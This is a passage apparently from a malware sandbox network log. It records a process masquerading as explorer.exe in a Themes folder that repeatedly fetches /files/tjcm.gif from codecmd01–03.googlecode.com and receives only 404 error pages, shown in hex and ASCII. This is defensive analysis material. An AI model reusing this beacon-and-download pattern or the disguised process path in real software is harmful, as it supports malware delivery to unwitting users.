                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:01.111268997 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:28:00 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:01.111301899 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      7192.168.2.649818173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:02.615875006 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd02.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:04.017339945 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:28:03 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:04.017395973 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      8192.168.2.649824173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:05.467211008 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd03.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:06.867300987 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:28:06 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:06.867328882 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      9192.168.2.649833173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:08.451157093 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd01.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:09.853758097 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:28:09 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:09.853776932 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      10192.168.2.649843173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:11.336266994 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd02.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:12.737180948 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:28:12 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:12.737198114 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      11192.168.2.649850173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:14.139621973 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd03.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:15.558887959 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:28:15 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:15.558998108 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      12192.168.2.649858173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:16.946151972 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd01.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:18.347290993 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:28:18 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
